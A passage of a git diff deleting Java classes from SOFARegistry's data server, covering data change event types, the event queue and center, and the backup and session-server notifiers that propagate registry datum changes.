DataSourceTypeEnum.PUB_TEMP) { - notifyTempPub(datum, sourceType, changeType); - return; - } - - MergeResult mergeResult = DatumCache.putDatum(changeType, datum); - lastVersion = mergeResult.getLastVersion(); - - if (lastVersion != null - && lastVersion.longValue() == DatumCache.ERROR_DATUM_VERSION) { - LOGGER - .error( - "[DataChangeHandler][{}] first put unPub datum into cache error, dataCenter={}, dataInfoId={}, version={}, sourceType={},isContainsUnPub={}", - name, dataCenter, dataInfoId, version, sourceType, - datum.isContainsUnPub()); - return; - } - - boolean changeFlag = mergeResult.isChangeFlag(); - - LOGGER - .info( - "[DataChangeHandler][{}] datum handle,datum={},dataCenter={}, dataInfoId={}, version={}, lastVersion={}, sourceType={}, changeType={},changeFlag={},isContainsUnPub={}", - name, datum.hashCode(), dataCenter, dataInfoId, version, lastVersion, - sourceType, changeType, changeFlag, datum.isContainsUnPub()); - //lastVersion null means first add datum - if (lastVersion == null || version != lastVersion) { - if (changeFlag) { - for (IDataChangeNotifier notifier : dataChangeNotifiers) { - if (notifier.getSuitableSource().contains(sourceType)) { - notifier.notify(datum, lastVersion); - } - } - } - } - } - } catch (Exception e) { - LOGGER - .error( - "[DataChangeHandler][{}] put datum into cache error, dataCenter={}, dataInfoId={}, version={}, sourceType={},isContainsUnPub={}", - name, dataCenter, dataInfoId, version, sourceType, datum.isContainsUnPub(), - e); - } - - } - - private void notifyTempPub(Datum datum, DataSourceTypeEnum sourceType, - DataChangeTypeEnum changeType) { - - String dataCenter = datum.getDataCenter(); - String dataInfoId = datum.getDataInfoId(); - long version = datum.getVersion(); - LOGGER - .info( - "[DataChangeHandler][{}] datum handle temp pub,datum={},dataCenter={}, dataInfoId={}, version={}, sourceType={}, changeType={},isContainsUnPub={}", - name, datum.hashCode(), dataCenter, dataInfoId, version, sourceType, - changeType, datum.isContainsUnPub()); - - for (IDataChangeNotifier notifier : dataChangeNotifiers) { - if (notifier.getSuitableSource().contains(sourceType)) { - notifier.notify(datum, null); - } - } - } - } -} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataChangeTypeEnum.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataChangeTypeEnum.java deleted file mode 100644 index ef3ba0a66..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataChangeTypeEnum.java +++ /dev/null @@ -1,32 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.change; - -/** - * enum for data change type - * - * @author qian.lqlq - * @version $Id: DataChangeTypeEnum.java, v 0.1 2017-12-07 18:43 qian.lqlq Exp $ - */ -public enum DataChangeTypeEnum { - - /** */ - MERGE, - - /** */ - COVER -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataSourceTypeEnum.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataSourceTypeEnum.java deleted file mode 100644 index c41a14f51..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataSourceTypeEnum.java +++ /dev/null @@ -1,50 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.change; - -/** - * - * @author qian.lqlq - * @version $Id: DataSourceTypeEnum.java, v 0.1 2018-03-12 18:01 qian.lqlq Exp $ - */ -public enum DataSourceTypeEnum { - - /** - * pub by client - */ - PUB, - - /** - * pub temporary data - */ - PUB_TEMP, - - /** - * sync from dataservers in other datacenter - */ - SYNC, - - /** - * from dataservers in the same datacenter - */ - BACKUP, - - /** - * local dataInfo check,not belong this node schedule remove - */ - CLEAN -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/ClientChangeEvent.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/ClientChangeEvent.java deleted file mode 100644 index c063f50d4..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/ClientChangeEvent.java +++ /dev/null @@ -1,87 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.change.event; - -/** - * - * @author qian.lqlq - * @version $Id: ClientChangeEvent.java, v 0.1 2018-05-10 17:12 qian.lqlq Exp $ - */ -public class ClientChangeEvent implements IDataChangeEvent { - - private String host; - - private String dataCenter; - - private long occurredTimestamp; - - private long version; - - /** - * constructor - * @param host - * @param dataCenter - * @param occurredTimestamp - */ - public ClientChangeEvent(String host, String dataCenter, long occurredTimestamp) { - this.host = host; - this.dataCenter = dataCenter; - this.occurredTimestamp = occurredTimestamp; - this.version = System.currentTimeMillis(); - } - - @Override - public DataChangeScopeEnum getScope() { - return DataChangeScopeEnum.CLIENT; - } - - /** - * Getter method for property host. - * - * @return property value of host - */ - public String getHost() { - return host; - } - - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - public String getDataCenter() { - return dataCenter; - } - - /** - * Getter method for property occurredTimestamp. - * - * @return property value of occurredTimestamp - */ - public long getOccurredTimestamp() { - return occurredTimestamp; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public long getVersion() { - return version; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/DataChangeEvent.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/DataChangeEvent.java deleted file mode 100644 index f92a8e36c..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/DataChangeEvent.java +++ /dev/null @@ -1,99 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.change.event; - -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.server.data.change.DataChangeTypeEnum; -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; - -/** - * event for data changed - * - * @author qian.lqlq - * @version $Id: DataChangeEvent.java, v 0.1 2017-12-07 18:44 qian.lqlq Exp $ - */ -public class DataChangeEvent implements IDataChangeEvent { - - /** - * type of changed data, MERGE or COVER - */ - private DataChangeTypeEnum changeType; - - /** - * - */ - private DataSourceTypeEnum sourceType; - - /** - * data changed - */ - private Datum datum; - - /** - * constructor - * @param changeType - * @param sourceType - * @param datum - */ - public DataChangeEvent(DataChangeTypeEnum changeType, DataSourceTypeEnum sourceType, Datum datum) { - this.changeType = changeType; - this.sourceType = sourceType; - this.datum = datum; - } - - /** - * Getter method for property changeType. - * - * @return property value of changeType - */ - public DataChangeTypeEnum getChangeType() { - return changeType; - } - - /** - * Getter method for property datum. - * - * @return property value of datum - */ - public Datum getDatum() { - return datum; - } - - /** - * Setter method for property datum. - * - * @param datum value to be assigned to property datum - */ - public void setDatum(Datum datum) { - this.datum = datum; - } - - /** - * Getter method for property sourceType. - * - * @return property value of sourceType - */ - public DataSourceTypeEnum getSourceType() { - return sourceType; - } - - @Override - public DataChangeScopeEnum getScope() { - return DataChangeScopeEnum.DATUM; - } - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/DataChangeEventCenter.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/DataChangeEventCenter.java deleted file mode 100644 index 58c5496e2..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/DataChangeEventCenter.java +++ /dev/null @@ -1,137 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.change.event; - -import com.alipay.sofa.registry.common.model.PublishType; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.store.Publisher; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.cache.UnPublisher; -import com.alipay.sofa.registry.server.data.change.DataChangeTypeEnum; -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; - -import java.util.concurrent.atomic.AtomicBoolean; - -/** - * - * @author qian.lqlq - * @version $Id: DataChangeEventCenter.java, v 0.1 2018-03-09 14:25 qian.lqlq Exp $ - */ -public class DataChangeEventCenter { - private AtomicBoolean isInited = new AtomicBoolean(false); - - /** - * count of DataChangeEventQueue - */ - private int queueCount; - - /** - * queues of DataChangeEvent - */ - private DataChangeEventQueue[] dataChangeEventQueues; - - /** - * - * @param config - */ - public void init(DataServerConfig config) { - if (isInited.compareAndSet(false, true)) { - queueCount = config.getQueueCount(); - dataChangeEventQueues = new DataChangeEventQueue[queueCount]; - for (int idx = 0; idx < queueCount; idx++) { - dataChangeEventQueues[idx] = new DataChangeEventQueue(idx, config); - dataChangeEventQueues[idx].start(); - } - } - } - - /** - * receive changed publisher, then wrap it into the DataChangeEvent and put it into dataChangeEventQueue - * - * @param publisher - * @param dataCenter - */ - public void onChange(Publisher publisher, String dataCenter) { - int idx = hash(publisher.getDataInfoId()); - Datum datum = new Datum(publisher, dataCenter); - if (publisher instanceof UnPublisher) { - datum.setContainsUnPub(true); - } - if (publisher.getPublishType() != PublishType.TEMPORARY) { - dataChangeEventQueues[idx].onChange(new DataChangeEvent(DataChangeTypeEnum.MERGE, - DataSourceTypeEnum.PUB, datum)); - } else { - dataChangeEventQueues[idx].onChange(new DataChangeEvent(DataChangeTypeEnum.MERGE, - DataSourceTypeEnum.PUB_TEMP, datum)); - } - } - - /** - * for local dataInfo datum schedule remove,config source type to avoid clean fire notify - * @param datum - * @param dataSourceTypeEnum - */ - public void clean(Datum datum, DataSourceTypeEnum dataSourceTypeEnum) { - int idx = hash(datum.getDataInfoId()); - dataChangeEventQueues[idx].onChange(new DataChangeEvent(DataChangeTypeEnum.COVER, - dataSourceTypeEnum, datum)); - } - - /** - * - * @param event - */ - public void onChange(ClientChangeEvent event) { - for (DataChangeEventQueue dataChangeEventQueue : dataChangeEventQueues) { - dataChangeEventQueue.onChange(event); - } - } - - /** - * - * @param changeType - * @param datum - */ - public void sync(DataChangeTypeEnum changeType, DataSourceTypeEnum sourceType, Datum datum) { - int idx = hash(datum.getDataInfoId()); - DataChangeEvent event = new DataChangeEvent(changeType, sourceType, datum); - dataChangeEventQueues[idx].onChange(event); - } - - /** - * compute target DataChangeEventQueue - * - * @param key - * @return - */ - private int hash(String key) { - if (queueCount > 1) { - return Math.abs(key.hashCode() % queueCount); - } else { - return 0; - } - } - - /** - * - * @return - */ - public DataChangeEventQueue[] getQueues() { - return dataChangeEventQueues; - } - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/DataChangeEventQueue.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/DataChangeEventQueue.java deleted file mode 100644 index 45e5cffab..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/DataChangeEventQueue.java +++ /dev/null @@ -1,258 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.change.event; - -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.store.Publisher; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.cache.DatumCache; -import com.alipay.sofa.registry.server.data.cache.UnPublisher; -import com.alipay.sofa.registry.server.data.change.ChangeData; -import com.alipay.sofa.registry.server.data.change.DataChangeTypeEnum; -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; -import com.alipay.sofa.registry.server.data.executor.ExecutorFactory; -import com.alipay.sofa.registry.server.data.node.DataServerNode; -import com.alipay.sofa.registry.server.data.remoting.dataserver.DataServerNodeFactory; -import com.google.common.collect.Interners; - -import java.util.Map; -import java.util.concurrent.BlockingQueue; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.DelayQueue; -import java.util.concurrent.Executor; -import java.util.concurrent.LinkedBlockingDeque; -import java.util.concurrent.locks.ReentrantLock; - -/** - * a queue of DataChangeEvent - * - * @author qian.lqlq - * @version $Id: DataChangeEventQueue.java, v 0.1 2017-12-11 17:10 qian.lqlq Exp $ - */ -public class DataChangeEventQueue { - - private static final Logger LOGGER = LoggerFactory - .getLogger(DataChangeEventQueue.class); - - /** - * - */ - private final String name; - - /** - * a block queue that stores all data change events - */ - private final BlockingQueue eventQueue; - - /** - * - */ - private final Map> CHANGE_DATA_MAP = new ConcurrentHashMap<>(); - - /** - * - */ - private final DelayQueue CHANGE_QUEUE = new DelayQueue(); - - private final int notifyIntervalMs; - - private final ReentrantLock lock = new ReentrantLock(); - - private DataServerConfig dataServerConfig; - - /** - * constructor - * @param idx - * @param dataServerConfig - */ - public DataChangeEventQueue(int idx, DataServerConfig dataServerConfig) { - - this.name = String.format("%s_%s", DataChangeEventQueue.class.getSimpleName(), idx); - this.dataServerConfig = dataServerConfig; - int queueSize = dataServerConfig.getQueueSize(); - if (queueSize <= 0) { - eventQueue = new LinkedBlockingDeque<>(); - } else { - eventQueue = new LinkedBlockingDeque<>(queueSize); - } - this.notifyIntervalMs = dataServerConfig.getNotifyIntervalMs(); - } - - /** - * receive event when data changed - * - * @param event - */ - public void onChange(IDataChangeEvent event) { - eventQueue.add(event); - } - - /** - * - * @return - */ - public String getName() { - return name; - } - - /** - * - * @return - * @throws InterruptedException - */ - public ChangeData take() throws InterruptedException { - ChangeData changeData = CHANGE_QUEUE.take(); - lock.lock(); - try { - Datum datum = changeData.getDatum(); - CHANGE_DATA_MAP.get(datum.getDataCenter()).remove(datum.getDataInfoId()); - return changeData; - } finally { - lock.unlock(); - } - } - - /** - * - * @param dataCenter - * @param dataInfoId - * @param sourceType - * @param changeType - * @return - */ - private ChangeData getChangeData(String dataCenter, String dataInfoId, - DataSourceTypeEnum sourceType, DataChangeTypeEnum changeType) { - Map map = CHANGE_DATA_MAP.get(dataCenter); - if (map == null) { - Map newMap = new ConcurrentHashMap<>(); - map = CHANGE_DATA_MAP.putIfAbsent(dataCenter, newMap); - if (map == null) { - map = newMap; - } - } - - ChangeData changeData = map.get(dataInfoId); - if (changeData == null) { - ChangeData newChangeData = new ChangeData(null, this.notifyIntervalMs, sourceType, - changeType); - changeData = map.putIfAbsent(dataInfoId, newChangeData); - if (changeData == null) { - changeData = newChangeData; - } - CHANGE_QUEUE.put(changeData); - } - return changeData; - } - - /** - * - */ - public void start() { - LOGGER.info("[{}] begin start DataChangeEventQueue", getName()); - Executor executor = ExecutorFactory.newSingleThreadExecutor( - String.format("%s_%s", DataChangeEventQueue.class.getSimpleName(), getName())); - executor.execute(() -> { - while (true) { - try { - IDataChangeEvent event = eventQueue.take(); - DataChangeScopeEnum scope = event.getScope(); - if (scope == DataChangeScopeEnum.DATUM) { - DataChangeEvent dataChangeEvent = (DataChangeEvent) event; - handleDatum(dataChangeEvent.getChangeType(), - dataChangeEvent.getSourceType(), dataChangeEvent.getDatum()); - } else if (scope == DataChangeScopeEnum.CLIENT) { - handleHost((ClientChangeEvent) event); - } - } catch (Throwable e) { - LOGGER.error("[{}] handle change event failed", getName(), e); - } - } - }); - LOGGER.info("[{}] start DataChangeEventQueue success", getName()); - } - - private void handleHost(ClientChangeEvent event) { - String clientHost = event.getHost(); - synchronized (Interners.newWeakInterner().intern(clientHost)) { - Map pubMap = DatumCache.getByHost(clientHost); - if (pubMap != null && !pubMap.isEmpty()) { - int count = 0; - for (Publisher publisher : pubMap.values()) { - DataServerNode dataServerNode = DataServerNodeFactory.computeDataServerNode( - dataServerConfig.getLocalDataCenter(), publisher.getDataInfoId()); - //current dataCenter backup data need not unPub,it will be unPub by backup sync event - if (DataServerConfig.IP.equals(dataServerNode.getIp())) { - Datum datum = new Datum(new UnPublisher(publisher.getDataInfoId(), - publisher.getRegisterId(), event.getOccurredTimestamp()), - event.getDataCenter(), event.getVersion()); - datum.setContainsUnPub(true); - handleDatum(DataChangeTypeEnum.MERGE, DataSourceTypeEnum.PUB, datum); - count++; - } - } - LOGGER - .info( - "[{}] client off handle, host={}, occurTimestamp={},version={},handle pub size={}", - getName(), clientHost, event.getOccurredTimestamp(), event.getVersion(), - count); - } else { - LOGGER.info("[{}] no datum to handle, host={}", getName(), clientHost); - } - } - } - - private void handleDatum(DataChangeTypeEnum changeType, DataSourceTypeEnum sourceType, - Datum targetDatum) { - lock.lock(); - try { - //get changed datum - ChangeData changeData = getChangeData(targetDatum.getDataCenter(), - targetDatum.getDataInfoId(), sourceType, changeType); - Datum cacheDatum = changeData.getDatum(); - if (changeType == DataChangeTypeEnum.COVER || cacheDatum == null) { - changeData.setDatum(targetDatum); - } else { - Map targetPubMap = targetDatum.getPubMap(); - Map cachePubMap = cacheDatum.getPubMap(); - for (Publisher pub : targetPubMap.values()) { - String registerId = pub.getRegisterId(); - Publisher cachePub = cachePubMap.get(registerId); - if (cachePub != null) { - // if the registerTimestamp of cachePub is greater than the registerTimestamp of pub, it means - // that pub is not the newest data, should be ignored - if (pub.getRegisterTimestamp() < cachePub.getRegisterTimestamp()) { - continue; - } - // if pub and cachePub both are publisher, and sourceAddress of both are equal, - // and version of cachePub is greater than version of pub, should be ignored - if (!(pub instanceof UnPublisher) && !(cachePub instanceof UnPublisher) - && pub.getSourceAddress().equals(cachePub.getSourceAddress()) - && cachePub.getVersion() >= pub.getVersion()) { - continue; - } - } - cachePubMap.put(registerId, pub); - cacheDatum.setVersion(targetDatum.getVersion()); - } - } - } finally { - lock.unlock(); - } - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/DataChangeScopeEnum.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/DataChangeScopeEnum.java deleted file mode 100644 index bfba719e5..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/DataChangeScopeEnum.java +++ /dev/null @@ -1,26 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.change.event; - -/** - * - * @author qian.lqlq - * @version $Id: DataChangeScopeEnum.java, v 0.1 2018-05-10 16:51 qian.lqlq Exp $ - */ -public enum DataChangeScopeEnum { - CLIENT, DATUM -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/IDataChangeEvent.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/IDataChangeEvent.java deleted file mode 100644 index 1006ce6ee..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/event/IDataChangeEvent.java +++ /dev/null @@ -1,31 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.change.event; - -/** - * - * @author qian.lqlq - * @version $Id: IDataChangeEvent.java, v 0.1 2018-05-10 17:11 qian.lqlq Exp $ - */ -public interface IDataChangeEvent { - - /** - * - * @return - */ - DataChangeScopeEnum getScope(); -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/notify/BackUpNotifier.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/notify/BackUpNotifier.java deleted file mode 100644 index 293376031..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/notify/BackUpNotifier.java +++ /dev/null @@ -1,51 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.change.notify; - -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; -import com.alipay.sofa.registry.server.data.datasync.Operator; -import com.alipay.sofa.registry.server.data.datasync.SyncDataService; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.HashSet; -import java.util.Set; - -/** - * - * @author qian.lqlq - * @version $Id: BackUpNotifier.java, v 0.1 2018-03-12 18:40 qian.lqlq Exp $ - */ -public class BackUpNotifier implements IDataChangeNotifier { - - @Autowired - private SyncDataService syncDataService; - - @Override - public Set getSuitableSource() { - Set set = new HashSet<>(); - set.add(DataSourceTypeEnum.PUB); - set.add(DataSourceTypeEnum.SYNC); - return set; - } - - @Override - public void notify(Datum datum, Long lastVersion) { - syncDataService.appendOperator(new Operator(datum.getVersion(), lastVersion, datum, - DataSourceTypeEnum.BACKUP)); - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/notify/IDataChangeNotifier.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/notify/IDataChangeNotifier.java deleted file mode 100644 index 8b5669eb2..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/notify/IDataChangeNotifier.java +++ /dev/null @@ -1,44 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.change.notify; - -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; - -import java.util.Set; - -/** - * - * @author qian.lqlq - * @version $Id: IDataChangeNotifier.java, v 0.1 2018-03-09 15:30 qian.lqlq Exp $ - */ -public interface IDataChangeNotifier { - - /** - * - * @return - */ - Set getSuitableSource(); - - /** - * - * @param datum - * @param lastVersion - */ - void notify(Datum datum, Long lastVersion); - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/notify/SessionServerNotifier.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/notify/SessionServerNotifier.java deleted file mode 100644 index 727156d35..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/notify/SessionServerNotifier.java +++ /dev/null @@ -1,204 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.change.notify; - -import com.alipay.remoting.Connection; -import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.sessionserver.DataChangeRequest; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.CallbackHandler; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.Server; -import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.cache.DatumCache; -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.SessionServerConnectionFactory; -import com.alipay.sofa.registry.timer.AsyncHashedWheelTimer; -import com.alipay.sofa.registry.timer.AsyncHashedWheelTimer.TaskFailedCallback; -import com.google.common.util.concurrent.ThreadFactoryBuilder; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.HashSet; -import java.util.List; -import java.util.Set; -import java.util.concurrent.TimeUnit; - -/** - * Notify session DataChangeRequest,if fail get result callback retry - * - * @author qian.lqlq - * @version $Id: SessionServerNotifier.java, v 0.1 2018-03-09 15:32 qian.lqlq Exp $ - */ -public class SessionServerNotifier implements IDataChangeNotifier { - - private static final Logger LOGGER = LoggerFactory - .getLogger(SessionServerNotifier.class); - - private AsyncHashedWheelTimer asyncHashedWheelTimer; - - @Autowired - private DataServerConfig dataServerBootstrapConfig; - - @Autowired - private Exchange boltExchange; - - @Autowired - private SessionServerConnectionFactory sessionServerConnectionFactory; - - public SessionServerNotifier() { - ThreadFactoryBuilder threadFactoryBuilder = new ThreadFactoryBuilder(); - threadFactoryBuilder.setDaemon(true); - asyncHashedWheelTimer = new AsyncHashedWheelTimer(threadFactoryBuilder.setNameFormat( - "Registry-SessionServerNotifier-WheelTimer").build(), 100, TimeUnit.MILLISECONDS, 1024, - threadFactoryBuilder.setNameFormat("Registry-SessionServerNotifier-WheelExecutor-%d") - .build(), new TaskFailedCallback() { - @Override - public void executionRejected(Throwable e) { - LOGGER.error("executionRejected: " + e.getMessage(), e); - } - - @Override - public void executionFailed(Throwable e) { - LOGGER.error("executionFailed: " + e.getMessage(), e); - } - }); - } - - @Override - public Set getSuitableSource() { - Set set = new HashSet<>(); - set.add(DataSourceTypeEnum.PUB); - set.add(DataSourceTypeEnum.SYNC); - return set; - } - - @Override - public void notify(Datum datum, Long lastVersion) { - DataChangeRequest request = new DataChangeRequest(datum.getDataInfoId(), - datum.getDataCenter(), datum.getVersion()); 